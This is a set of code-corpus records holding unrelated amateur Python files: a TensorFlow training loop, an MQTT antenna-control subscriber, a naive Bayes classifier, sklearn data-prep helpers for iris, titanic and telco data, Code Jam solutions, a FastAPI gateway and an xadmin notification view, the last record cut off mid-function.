sess:\r\n\t\r\n\t\t#initialize all the variables by running the op\r\n\t\tsess.run(init)\r\n\t\t\r\n\t\t#variable for tracking losses - to be displayed in losses.png\r\n\t\tlosses = []\r\n\t\t\r\n\t\t# Start input enqueue threads.\r\n\t\tcoord = tf.train.Coordinator()\r\n\t\tthreads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n\t\t\r\n\t\tprint(\"Starting threading\")\r\n\t\t\r\n\t\titeration = 0\r\n\t\tlast_loss = 1\r\n\t\ttry:\r\n\t\t\twhile not coord.should_stop():\r\n\t\t\t\tstart_time = time.time()\r\n\t\t\t\t\r\n\t\t\t\timage, label, gt = sess.run([images, labels, gts])\r\n\t\t\t\t\r\n\t\t\t\tif iteration == 1:\r\n\t\t\t\t\tprint(\"label:\")\r\n\t\t\t\t\tprint(label)\r\n\t\t\t\t\tprint(\"gt:\")\r\n\t\t\t\t\tprint(gt)\r\n\t\t\t\t\t\r\n\t\t\t\t\tfig2=plt.figure()\r\n\t\t\t\t\ta2=fig2.add_subplot(111)\r\n\t\t\t\t\ta2.plot(gt, gt, 'ro', label=\"ground truth\")\r\n\t\t\t\t\ta2.plot(gt, label, 'bo', label=\"labels\")\r\n\t\t\t\t\tplt.legend()\r\n\t\t\t\t\tfig2.savefig('output/cnn-e%d-p10000/first_iteration_train_cnn.png' % (FLAGS.num_epochs))\r\n\t\t\t\t\r\n\t\t\t\t# Predict label\r\n\t\t\t\tlogit = sess.run([logits], feed_dict={images_placeholder: image})\r\n\t\t\t\t\r\n\t\t\t\t# Calculate loss\r\n\t\t\t\t_, loss_value = sess.run([train_op, loss], feed_dict={images_placeholder: image, labels_placeholder:label})\r\n\t\t\t\tlast_loss = loss_value\r\n\t\t\t\t\r\n\t\t\t\t# Logging information\r\n\t\t\t\tlosses.append(loss_value)\r\n\t\t\t\t\r\n\t\t\t\tduration = time.time() - start_time\r\n\t\t\t\t\r\n\t\t\t\t#Print overview\r\n\t\t\t\tprint(\"Step: %d, Loss:%.6f\" % (iteration, loss_value))\r\n\r\n\t\t\t\tif iteration % 100 == 0:\r\n\t\t\t\t\tprint('Step %d: loss = %.2f (%.3f sec)' % (iteration, loss_value, duration))\r\n\r\n\t\t\t\t#Possibility to save checkpoint if Training is to be conducted in several chunks\t\t\t\t\r\n\t\t\t\t\"\"\"\r\n\t\t\t\tif(step + 1) % 1000 == 0:\r\n\t\t\t\t\tprint('Saving checkpoint...')\r\n\t\t\t\t\tcheckpoint_file = os.path.join(FLAGS.train_dir, 'checkpoint')\r\n\t\t\t\t\tsaver.save(sess, checkpoint_file, global_step=step)\"\"\"\r\n\t\t\t\t\r\n\t\t\t\titeration += 1\r\n\t\t\t\t\r\n\t\texcept tf.errors.OutOfRangeError:\r\n\t\t\tprint('Done training for %d epochs, %d iterations.' % (FLAGS.num_epochs, iteration))\r\n\t\t\tf.write('Done training for %d epochs, %d iterations.\\n' % (FLAGS.num_epochs, iteration))\r\n\t\t\tf.write('Final loss value: %.3f\\n' % (last_loss))\r\n\t\tfinally:\r\n\t\t\tcoord.request_stop()\r\n\t\t\t\r\n\t\t# Wait for threads to finish.\r\n\t\tcoord.join(threads)\r\n\t\t\r\n\t\tcheckpoint = 'output/cnn-e%d-p10000/check' % (FLAGS.num_epochs)\r\n\t\tprint(checkpoint)\r\n\t\tcheckpoint_meta = 'output/cnn-e%d-p10000/check.meta' % (FLAGS.num_epochs)\r\n\t\tprint(checkpoint_meta)\r\n\t\t\t\t\r\n\t\tsaver.save(sess, checkpoint)\r\n\t\tsaver.export_meta_graph(checkpoint_meta)\r\n\t\t\r\n\t\ttf.train.write_graph(tf.get_default_graph().as_graph_def(), \"/tmp\", \"exported.pbtxt\", as_text=True)\r\n\t\t\r\n\t\tfig=plt.figure()\r\n\t\ta1=fig.add_subplot(111)\r\n\t\ta1.plot(losses, label=\"losses\")\r\n\t\tfig.savefig('output/cnn-e%d-p10000/cnn_losses.png' % (FLAGS.num_epochs))\r\n\t\t\r\n\t\tsess.close\r\n\r\ndirectory = 'output/cnn-e' + str(FLAGS.num_epochs) + '-p10000'\r\nprint(directory)\r\nif not os.path.exists(directory):\r\n\tos.makedirs(directory)\r\n\t\r\n\t\r\nf = open('output/cnn-e%d-p10000/log' % (FLAGS.num_epochs), 'a+')\r\nf.write('\\n\\n----CNN REGRESSOR TRAINING----\\n\\n')\r\nf.write('Batch size: %d\\n' % (FLAGS.batch_size))\r\nf.write('Number of epochs: %d\\n' % (FLAGS.num_epochs))\r\nf.write('Image size: %d\\n\\n' % (FLAGS.image_pixels))\r\nf.write('--Model information--\\n')\r\nf.write('Layer 1 hidden units: %d\\n' % (FLAGS.hidden1))\r\nf.write('Layer 2 hidden units: %d\\n\\n' % (FLAGS.hidden2))\r\nf.write('--Results--\\n')\r\n\r\nrun_training()\r\n\r\nstart_time=datetime.datetime.now()\r\nf.write('\\nStarted training: ')\r\nf.write(str(start_time))\r\nf.write('\\n')\r\nend_time=datetime.datetime.now()\r\nf.write('Finished training: ')\r\nf.write(str(end_time))\r\nf.write('\\nTraining took: ')\r\nf.write(str(end_time - start_time))\r\nf.write('\\n\\nTraining ended successfully\\n')\r\nf.close()","repo_name":"krisztinagy/master_thesis","sub_path":"M2/cnn_regressor_training.py","file_name":"cnn_regressor_training.py","file_ext":"py","file_size_in_byte":13727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6534299358","text":"import paho.mqtt.client as mqttClient\nimport paho.mqtt.publish as publish\nimport json\nimport threading\nfrom posicion import YaetsuG5500\n\n\ndef suscriptor_MQTT(**accion):\n \"\"\"Este es el suscriptor que se ejecuta en el esclavo\n para poder recibir las ordenes del maestro\n \"\"\"\n def on_connect(client, userdata, flags, rc):\n client.subscribe(\"radioastronomia/subsistemaposicion\")\n if rc == 0:\n print(\"conexion exitosa con el broker\")\n\n def on_message(client, userdata, message):\n msg = json.loads(message.payload.decode())\n print(msg)\n\n azimut = msg[\"azimut\"]\n elevacion = msg[\"elevacion\"]\n region = msg[\"region\"]\n antena = msg[\"antena\"]\n controlador = YaetsuG5500(accion[\"IP_server\"])\n controlador.control(int(azimut), int(elevacion), region, antena)\n\n\n broker_address= accion[\"IP_broker\"]\n port = accion[\"PORT_broker\"]\n # broker_address= \"centrotic1uis.cloudapp.net\n # port = 8443\n client = mqttClient.Client()\n client.username_pw_set(\"pi\", password=\"raspberry\")\n client.connect(broker_address, port=port)\n client.on_connect= on_connect\n client.on_message= on_message\n client.loop_forever()\n\n\nif __name__ == \"__main__\":\n global IP_server, IP_broker, PORT_broker\n IP_server = \"192.168.0.108:8000\"\n IP_broker = \"35.243.199.245\"\n PORT_broker = 1883\n\n kwargs = {\"IP_server\": IP_server, \"IP_broker\":IP_broker, \"PORT_broker\": PORT_broker}\n hilo1 = threading.Thread(target=suscriptor_MQTT, kwargs=kwargs)\n hilo1.start()\n","repo_name":"Narenman/CentroTIC","sub_path":"Modulos_aplicaciones/radioastronomia/subsistema_posicion/slavepos.py","file_name":"slavepos.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26540415837","text":"import numpy as np\n\n#导入文档信息\ndef loadDataSet(filename):\n file = open(filename)\n list = file.readlines()\n returnList = []\n for line in list:\n temp = line.strip().split(' ')\n returnList.append(temp)\n classVec = [0,1,0,1,0,1]\n return returnList,classVec\n\n# 创建词汇表\ndef createVocabList(dataSet):\n vocabSet = set([])\n for document in dataSet:\n vocabSet = vocabSet | set(document)\n return list(vocabSet)\n\n# 输入文本转为词向量\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the world %s is not in the vocablist!\" %word)\n return returnVec\n\ndef createTrainMax(vocabList, dataList):\n trainMax = []\n for data in dataList:\n trainMax.append(setOfWords2Vec(vocabList,data))\n return trainMax\n\ndef trainNB0(trainMatrix,trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n p0Num = np.ones(numWords); p1Num = np.ones(numWords)\n p0Denom = 1.0; p1Denom = 1.0 #对概率做平滑处理,分子预设为1,分母预设为2\n for i in range (numTrainDocs):\n if trainCategory[i] == 1:\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n p1Vect = np.log(p1Num/p1Denom) #由于概率乘积数值过小,可能会引起下溢出,所以用log,\n p0Vect = np.log(p0Num/p0Denom)\n return p1Vect,p0Vect,pAbusive\n\ndef classifyNB(vec2Classify,p0Vec,p1Vec,pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1-pClass1)\n if p1 > p0: return 1\n else: return 0\n\nif __name__ == '__main__':\n datalist,classVec = loadDataSet('dataset.txt')\n vocablist = createVocabList(datalist)\n trainMax = createTrainMax(vocablist,datalist)\n #print(setOfWords2Vec(vocablist,['my','dog','stupid']))\n\n # print(trainNB0(trainMax,classVec))\n p1Vec,p0Vec,pClass1 = trainNB0(trainMax,classVec)\n myWord = ['my','love','my','dog']\n myWord2Vec = setOfWords2Vec(vocablist,myWord)\n print(\"the class is %d !\" % classifyNB(myWord2Vec,p0Vec,p1Vec,pClass1))","repo_name":"ITJaylon/ML","sub_path":"朴素贝叶斯/native.py","file_name":"native.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70111123395","text":"import wikipedia\n\n\ndef findarticle(article):\n\t\n\t#Finds the name of the closest article to user input\n\tsearch = wikipedia.search(article)\n\tarticle = search[0]\n\t\n\t#Stores the article as a string (for parsing and finding key words later)\n\tx = wikipedia.page(article)\n\tstr_article = str(x.content)\n\treturn article, str_article\n\t\n","repo_name":"frankye8998/WikiWordInferer","sub_path":"find_article.py","file_name":"find_article.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35191036262","text":"import numpy as np\nimport pandas as pd\n\n# train test split from sklearn\nfrom sklearn.model_selection import train_test_split\n# imputer from sklearn\n# help with missing value by replacing blank with: median, mode, average, calculate using other column\nfrom sklearn.impute import SimpleImputer\n\n\n#-----------------------IRIS -------------------------------------------------------------------\ndef prep_iris(df):\n ''' This function takes in iris dataframe will drop columns ['species_id,'measurement_id']\n rename 'species name' to 'species'. \n Creates a dummy data frame to encode the categorical values of species and concatanate \n back into the original dataframe\n '''\n # use method to drop columns\n df.drop(columns = ['species_id','measurement_id'], inplace = True)\n \n # use method .rename to rename columns\n df.rename(columns={\"species_name\": \"species\"}, inplace = True)\n \n # create dummy data frame that encodes the 3 unique species name\n dummy_iris_df = pd.get_dummies(df['species'], dummy_na = False)\n \n # concatenate the dummy_df with original data frame\n new_iris_df = pd.concat([df, dummy_iris_df], axis = 1)\n \n return new_iris_df\n\ndef clean_iris(df):\n\n '''Prepares acquired Iris data for exploration'''\n \n # drop column using .drop(columns=column_name)\n df = df.drop(columns='species_id')\n \n # remame column using .rename(columns={current_column_name : replacement_column_name})\n df = df.rename(columns={'species_name':'species'})\n \n # create dummies dataframe using .get_dummies(column_name,not dropping any of the dummy columns)\n dummy_df = pd.get_dummies(df['species'], drop_first=False)\n \n # join original df with dummies df using .concat([original_df,dummy_df], join along the index)\n df = pd.concat([df, dummy_df], axis=1)\n \n return df\n\ndef split_iris_data(df):\n '''\n take in a DataFrame and return train, validate, and test DataFrames; stratify on species.\n return train, validate, test DataFrames.\n '''\n \n # splits df into train_validate and test using train_test_split() stratifying on species to get an even mix of each species\n train_validate, test = train_test_split(df, test_size=.2, random_state=123, stratify=df.species)\n \n # splits train_validate into train and validate using train_test_split() stratifying on species to get an even mix of each species\n train, validate = train_test_split(train_validate, \n test_size=.3, \n random_state=123, \n stratify=train_validate.species)\n return train, validate, test\n\n#-----------------------TITANIC -------------------------------------------------------------------\n\ndef prep_titanic(df):\n '''\n This function takes in dataframe and\n drops columns embarked', 'pclass', 'passenger_id', 'deck' and\n encodes 'sex', 'class', 'embark_town' with drop_first false and\n concatenates encoded df with original df\n '''\n \n # dropped columns 'embarked', 'pclass', 'passenger_id', 'deck\n df.drop(columns = ['embarked', 'pclass', 'passenger_id', 'deck'], inplace = True)\n \n # encode titanic dataframe for sex', 'class', 'embark_town\n dummy_df = pd.get_dummies(df[['sex', 'class', 'embark_town']], dummy_na=False, drop_first=[False])\n \n # concatenate dummy data frame to original dataframe\n df = pd.concat([df,dummy_df], axis=1)\n\n return df\n\ndef clean_titanic_data(df):\n '''\n This function will clean the data prior to splitting.\n '''\n # Drops any duplicate values\n df = df.drop_duplicates()\n\n # Drops columns that are already represented by other columns\n cols_to_drop = ['deck', 'embarked', 'class', 'passenger_id']\n df = df.drop(columns=cols_to_drop)\n\n # Fills the small number of null values for embark_town with the mode\n df['embark_town'] = df.embark_town.fillna(value='Southampton')\n\n # Uses one-hot encoding to create dummies of string columns for future modeling \n dummy_df = pd.get_dummies(df[['sex', 'embark_town']], dummy_na=False, drop_first=[True])\n df = pd.concat([df, dummy_df], axis=1)\n\n return df\n\ndef split_titanic_data(df):\n '''\n Takes in a dataframe and return train, validate, test subset dataframes\n '''\n # Creates the test set\n train, test = train_test_split(df, test_size = .2, random_state=123, stratify=df.survived)\n \n # Creates the final train and validate set\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.survived)\n \n return train, validate, test\n\ndef impute_titanic_mode(train, validate, test):\n '''\n Takes in train, validate, and test, and uses train to identify the best value to replace nulls in embark_town\n Imputes that value into all three sets and returns all three sets\n '''\n imputer = SimpleImputer(missing_values = np.nan, strategy='most_frequent')\n train[['embark_town']] = imputer.fit_transform(train[['embark_town']])\n validate[['embark_town']] = imputer.transform(validate[['embark_town']])\n test[['embark_town']] = imputer.transform(test[['embark_town']])\n return train, validate, test\n\ndef impute_mean_age(train, validate, test):\n '''\n This function imputes the mean of the age column for\n observations with missing values.\n Returns transformed train, validate, and test df.\n '''\n # create the imputer object with mean strategy\n imputer = SimpleImputer(strategy = 'mean')\n \n # fit on and transform age column in train\n train['age'] = imputer.fit_transform(train[['age']])\n \n # transform age column in validate\n validate['age'] = imputer.transform(validate[['age']])\n \n # transform age column in test\n test['age'] = imputer.transform(test[['age']])\n \n return train, validate, test\n#-------------------TELCO CHURN ------------------------------------------------------------------\n\ndef prep_telco(df):\n '''\n This function takes in dataframe and \n drops columns:'payment_type_id', 'internet_service_type_id', 'contract_type_id' \n encode categorical columns, drop_first set to False: 'senior_citizen'gender','partner','dependents','phone_service','multiple_lines','online_security','online_backup','device_protection', 'tech_support','streaming_tv','streaming_movies','paperless_billing', 'total_charges', 'churn','contract_type','internet_service_type','payment_type'\n Concatenate dummy_df to original data frame\n '''\n \n # drop unnecessary : payment_type_id', 'internet_service_type_id', 'contract_type_id' \n df = df.drop(columns=['payment_type_id', 'internet_service_type_id', 'contract_type_id' ])\n \n #convert total_charges to numeric data\n df.total_charges = df.total_charges.replace(' ', np.nan).astype(float)\n # encode categorical drop_first set to False 'senior_citizen'gender','partner','dependents','phone_service','multiple_lines','online_security','online_backup','device_protection', 'tech_support','streaming_tv','streaming_movies','paperless_billing', 'total_charges', 'churn','contract_type','internet_service_type','payment_type'\n dummy_df = pd.get_dummies(df[[\n 'gender','partner',\n 'dependents',\n 'phone_service',\n 'multiple_lines',\n 'online_security',\n 'online_backup',\n 'device_protection', \n 'tech_support',\n 'streaming_tv',\n 'streaming_movies',\n 'paperless_billing',\n 'churn',\n 'contract_type',\n 'internet_service_type',\n 'payment_type']], dummy_na=False)\n\n \n # Concatenate dummy_df to original data frame\n df = pd.concat([df, dummy_df], axis=1)\n \n return df\n\ndef split_telco_data(df):\n '''\n This function performs split on telco data, stratify churn.\n Returns train, validate, and test dfs.\n '''\n train_validate, test = train_test_split(df, test_size=.2, \n random_state=123, \n stratify=df.churn)\n train, validate = train_test_split(train_validate, test_size=.3, \n random_state=123, \n stratify=train_validate.churn)\n return train, validate, test\n\n\ndef impute_mean_total_charges(train, validate, test):\n '''\n This function imputes the mean of the total charge column for\n observations with missing values.\n Returns transformed train, validate, and test df.\n '''\n # create the imputer object with mean strategy\n imputer = SimpleImputer(strategy = 'mean')\n \n # fit on and transform total_charges column in train\n train['total_charges'] = imputer.fit_transform(train[['total_charges']])\n \n # transform total_charges column in validate\n validate['total_charges'] = imputer.transform(validate[['total_charges']])\n \n # transform total_charges column in test\n test['total_charges'] = imputer.transform(test[['total_charges']])\n \n return train, validate, test\n#---------------------- Function for train_validate_test---------------------\ndef train_validate_test(df, target):\n ''' This function takes in a dataframe and target variable to sratify and splits the data into \n train , validate, test'''\n \n train, test = train_test_split(df, test_size=.2, random_state=123, stratify=df[target])\n train, validate = train_test_split(train, test_size=.25, random_state=123, stratify=train[target])\n \n return train, validate, test\n\n\n\n","repo_name":"Yvette-Ibarra/classification-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":9950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568880501","text":"def nma(num, p):\n # 1\n num = int(num)\n p = int(p)\n lst = [num]\n for k in range(p):\n # print(lst)\n temp = max(lst)\n # lst.remove(temp)\n lst.remove(temp)\n if temp % 2:\n res_f = temp // 2\n res_s = temp // 2\n else:\n res_f = temp / 2\n if res_f == 0:\n res_s = 0\n else:\n res_s = res_f - 1\n if res_f > 0:\n lst.append(res_f)\n if res_s > 0:\n lst.append(res_s)\n #print(lst, lst.count(1), lst.count(0))\n return int(res_f), int(res_s)\nn = int(input())\nres = \"\"\nfor i in range(n):\n res += \"Case #{0}: {1} {2}\\n\".format(i+1, *nma(*input().strip().split(\" \")))\nprint(res, end=\"\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1952.py","file_name":"1952.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19324216524","text":"# Задание №1_____\n\nclass Date:\n def __init__(self, date):\n self.date = date\n\n @classmethod\n def extractor(cls, date):\n day, month, year = map(int, date.split('-'))\n return day, month, year\n\n @staticmethod\n def valid(date_int):\n day, month, year = Date.extractor(date_int)\n if 2099 >= year <= 1900 or 12 > month < 1 or 1 > day > 31:\n return print('Не верная дата')\n elif month in (4, 6, 9, 11) and day > 30:\n return print('Не верная дата')\n elif (year % 400 != 0 and (year % 4 != 0 and year % 100 != 0)) and month == 2 and day > 28:\n return print('Не верная дата')\n else:\n return print('Верная дата')\n\n\nprint(Date.extractor('16-08-2022'))\nDate.valid('31-05-1057')\nDate.valid('31-04-3020')\nDate.valid('32-11-2019')\nDate.valid('28-02-2024')\nDate.valid('29-02-2015')\nDate.valid('20-02-2010')\nDate.valid('31-01-2008')\nDate.valid('15-07-2016')\n\n\n\n# Задание №2_____\n\nclass Division_on_Null:\n def __init__(self, divider, denominator):\n self.divider = divider\n self.denominator = denominator\n\n @staticmethod\n def divide_on_null(divider, denominator):\n try:\n return (divider / denominator)\n except:\n return (f\"Деление на ноль невозможно\")\n\n\ndiv = Division_on_Null(10, 100)\nprint(Division_on_Null.divide_on_null(10, 0))\nprint(Division_on_Null.divide_on_null(10, 0.1))\nprint(div.divide_on_null(100, 0))\n\n# Задание №3_____________\n\nclass IntException(Exception):\n def __init__(self):\n self.txt = 'Введено не число! '\n\n\nres_list = []\nwhile True:\n inp_user = input('Введите число или Enter для выхода ')\n if inp_user == '':\n break\n else:\n try:\n if inp_user.isdigit():\n res_list.append(int(inp_user))\n elif inp_user.count('.') > 1:\n raise IntException\n else:\n for sym in inp_user:\n if not sym.isdigit() and sym != '.':\n raise IntException\n res_list.append(float(inp_user))\n except IntException as err:\n print(err.txt)\n\n\n# Задание № 4 - 6__________\n\nfrom abc import ABC, abstractmethod\n\n\nclass Department(ABC):\n\n @abstractmethod\n def add(self, type_technic, data):\n pass\n\n\nclass MyTypeError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n\nclass Storage:\n\n def __init__(self):\n self.__storage = {}\n\n @property\n def storage(self):\n return self.__storage\n\n def add_technic(self, technic, number):\n try:\n if not isinstance(number, int):\n raise MyTypeError('type of number must be int')\n technic.params['number'] = number\n if not self.__storage.get(technic.type_technic):\n self.__storage[technic.type_technic] = {technic.name: technic.params}\n else:\n self.__storage[technic.type_technic].setdefault(technic.name, technic.params)\n except MyTypeError as x:\n print(x)\n\n def transfer_to_department(self, technic, department):\n department.add(technic.type_technic, self.__storage.get(technic.type_technic))\n\n\nclass TransportDepartment(Department):\n\n def __init__(self):\n self.__storage = {}\n\n @property\n def storage(self):\n return self.__storage\n\n def add(self, type_technic, data):\n if not self.__storage.get(type_technic):\n self.__storage[type_technic] = data\n else:\n self.__storage[type_technic].setdefault(data)\n\n\nclass OfficeTechnics:\n\n def __init__(self, name: str, color: str):\n self.name = name\n self.color = color\n\n\nclass Printer(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.print_speed = speed\n self.params = {'name': self.name, 'color': self.color, 'print_speed': self.print_speed}\n\n\nclass Scanner(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.scan_speed = speed\n self.params = {'name': self.name, 'color': self.color, 'scan_speed': self.scan_speed}\n\n\nclass Copier(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.copy_speed = speed\n self.params = {'name': self.name, 'color': self.color, 'copy_speed': self.copy_speed}\n\n\nif __name__ == '__main__':\n printer = Printer('HP', 'Black', 12)\n scaner = Scanner('Canon', 'White', 15)\n copier = Copier('Canon', 'Gray', 23)\n print(f'printer: {printer}')\n print(f'scaner: {scaner}')\n print(f'copier: {copier}')\n storage = Storage()\n storage.add_technic(printer, 20)\n storage.add_technic(scaner, 50)\n print(f'storage: {storage.storage}')\n transportDep = TransportDepartment()\n storage.transfer_to_department(scaner, transportDep)\n print(f'transportDep storage: {transportDep.storage}')\n\n# Задание №7_______\n\n\n","repo_name":"Buanzu/Python","sub_path":"Homework_lesson_8.py","file_name":"Homework_lesson_8.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23545321481","text":"\nf=open(\"A-large.in\",\"r\")\nt=int(f.readline().strip(\"\\n\"))\nf2=open(\"A-large.out\",\"w\")\nfor y in range(1,1+t):\n l=f.readline().strip(\"\\n\").split()\n s=list(l[0])\n k=int(l[1])\n i=0\n c=0\n while True:\n\n while s[i]=='+' and i<=len(s)-k:\n i+=1\n\n if i<=len(s)-k:\n for j in range(i,i+k):\n s[j]=\"+\" if s[j]==\"-\" else \"-\"\n c+=1\n else:\n break\n\n\n r=True\n for j in range (len(s)-k,len(s)):\n if s[j]==\"-\":\n r=False\n if r:\n f2.write(\"Case #\"+str(y)+\": \"+str(c)+\"\\n\")\n else:\n f2.write(\"Case #\"+str(y)+\": \"+\"IMPOSSIBLE\"+\"\\n\")\nf.close()\nf2.close()\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3067.py","file_name":"3067.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18249416203","text":"import json\nimport requests as rq\nfrom fastapi import FastAPI\n\n\n\n\napp = FastAPI()\n\n\n# Remember that this path is inside the docker container\nwith open(\"src/config.json\") as json_file:\n config = json.load(json_file)\n\nUSER_SERVICE_INFO = config[\"user_service\"]\nDATA_SERVICE_INFO = config[\"data_service\"] \n\n\n\n@app.get(\"/\")\ndef read_root():\n return \"********** SIMPLE FASTAPI **********\"\n\n\n############### HEALTH ###############\n@app.get(\"/api/health\")\ndef read_health():\n return {\"status\" : \"ok\"}\n\n\n@app.get(\"/api/user/health\")\ndef read_user_health():\n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"health_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n\n return content\n\n\n@app.get(\"/api/data/health\")\ndef read_data_health():\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"health_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n\n return content\n\n\n\n\n############### CREATE ###############\n@app.post(\"/api/user/create\")\ndef create_user(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n\n## create\n@app.post(\"/api/data\")\ndef create_indicator(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n## update\n@app.patch(\"/api/data/{id}\")\ndef update_indicator(slug: str, data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n # .format is a necessity becuase the update_route contains a place holder and using something like \"+ slug\" will keep the placeholder as a str and makes the url invalid!\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"update_route\"].format(slug=slug)\n\n response = rq.put(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n## upsert\n@app.put(\"/api/data\")\ndef create_indicator(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n\n\n############### GET ###############\n@app.get(\"/api/data/content\")\ndef get_all_indicators():\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"get_all_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n \n return content \n\n\n@app.get(\"/api/user/content/{slug}\")\ndef get_user(slug: str):\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"get_one_route\"].format(slug=slug)\n \n response = rq.get(url)\n\n content = response.json()\n \n return content \n\n\n@app.get(\"/api/data/content/{slug}\")\ndef get_indicator(slug: str):\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"get_one_route\"].format(slug=slug)\n\n response = rq.get(url)\n \n content = response.json()\n \n return content \n\n\n############### DELETE ###############\n@app.get(\"/api/user/delete/{slug}\")\ndef delete_user(slug: str):\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"delete_route\"].format(slug=slug)\n\n response = rq.get(url)\n\n content = response.json()\n \n return content\n\n\n@app.get(\"/api/data/delete/{slug}\")\ndef delete_indicator(slug: str):\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"delete_route\"].format(slug=slug)\n\n response = rq.get(url)\n\n content = response.json()\n \n return content","repo_name":"Wasim-Haj-Ali/dude_path","sub_path":"src/gateway_service/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36431744836","text":"from django.shortcuts import redirect\n\nfrom notifications.models import Notification\n\nimport xadmin\nfrom xadmin import views\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\n\nclass Noticeview(views.CommAdminView):\n def set_page_obj(self,objects):\n try:\n page = self.request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(objects, 10,request=self.request)\n notices=p.page(page)\n context = super().get_context()\n context[\"notices_pageobj\"]=notices\n context[\"count\"] = len(objects)\n self.context=context\n def set_obj_breadcrumbs(self,dict):\n context = super().get_context()\n context[\"breadcrumbs\"].append(dict)\n context[\"title\"] = dict.get('title')\n self.context = context\n def get_context(self):\n return super().get_context()\n\n\nclass UnreadView(Noticeview):\n def update_to_do(self):\n request=self.request\n to_do=request.GET.get('todo',None)\n if not to_do: return\n if to_do=='all':\n self.user.notifications.unread().mark_all_as_read()\n elif to_do=='top':\n ids=[notify.id for notify in self.user.notifications.unread()[:10]]\n Notification.objects.filter(id__in=ids).mark_all_as_read()\n else:\n try:\n id = int(to_do)\n n=Notification.objects.get(id=id)\n n.mark_as_read()\n return n.get_target_url()\n except:\n pass\n\n def get(self, request, *args, **kwargs):\n re=self.update_to_do()\n if re:return redirect(re)\n self.set_obj_breadcrumbs({'url': '/notice/unread/', 'title': \"未读消息\"})\n objects=self.user.notifications.unread().exclude(status=\"待发送\").prefetch_related('nfrom').myprefetch_related('actor','target')\n self.set_page_obj(objects)\n context=self.context\n context[\"type\"]='未读通知'\n return self.template_response('xadmin/views/messages.html', context)\nxadmin.site.register_view(r'notice/unread/$', UnreadView,name='unread')\n\n\nclass ReadView(Noticeview):\n def update_to_do(self):\n request=self.request\n to_do=request.GET.get('todo',None)\n if not to_do:return\n if to_do=='all':\n self.user.notifications.read().mark_all_as_deleted()\n elif to_do=='top':\n ids = [notify.id for notify in self.user.notifications.read()[:10]]\n Notification.objects.filter(id__in=ids).mark_all_as_deleted()\n else:\n try:\n 